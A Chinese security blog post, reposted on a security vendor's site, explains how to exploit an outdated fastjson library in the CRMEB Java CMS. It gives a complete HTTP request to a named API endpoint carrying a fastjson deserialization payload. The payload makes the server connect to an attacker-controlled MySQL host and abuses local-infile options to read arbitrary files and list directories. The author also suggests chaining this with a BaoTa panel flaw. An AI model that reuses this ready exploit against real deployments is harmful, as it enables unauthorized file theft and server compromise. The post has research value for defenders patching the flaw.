长亭百川云 - 文章详情

crmeb java版本CMS fastjson利用 - sevck

博客园 - sevck

45

2024-07-19

4.5K start 2K fork的项目,之前用了低版本的fastjson,新版本修复了。

https://gitee.com/ZhongBangKeJi/crmeb\_java

之前用1.2.56版本fastjson,1.2.68公开的有fastjson commons-io AutoCloseable写任意文件,本地测payload没问题,真实场景利用不了

引用su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737

注意:由于 fastjson 获取 WriterOutputStream 的构造方法时并不唯一,所以这个 payload 并不是每次都能触发,需要等随机到带有指定参数的构造方法才能触发,测试的小伙伴多测几次就可以写入了。如果你有解决这个问题的办法请联系我。

springboot来说也有点鸡肋,在blackhat 2021有人提出了新的姿势:

https://blog.noah.360.net/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/

刚好可以配合mysql的jdbc,让fastjson主动去链接我的mysql,根据已学知识,我们在继续构造payload,再利用"allowUrlInLocalInfile":"true","allowLoadLocalInfile":"true","allowLoadLocalInfileInPath":"/",

可以构成任意文件读取&&任意文件下载,下载jar包,,利用file:// 可以做到列目录,再与宝塔漏洞再进行利用无敌。

show code:

POST /api/public/wechat/gitlab?token=aa HTTP/1.1
Host: 192.168.220.2:8081
Content\-Length: 479
Request\-Origion: SwaggerBootstrapUi
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Authori-zation: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.220.2:8081
Referer: http://192.168.220.2:8081/doc.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"xxxxx","portToConnectTo":1234,"databaseToConnectTo":"test","info": {"@type":"java.util.Properties","PORT":"1234",
"allowUrlInLocalInfile":"true",
"allowLoadLocalInfile":"true",
"allowLoadLocalInfileInPath":"/",
"maxAllowedPacket":"655360",
"user":"fileread\_file:///.","PORT.1":"1234","HOST.1":"xxxxxxxxx","NUM\_HOSTS":"1","HOST":"xxxxx","DBNAME":"test"}

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2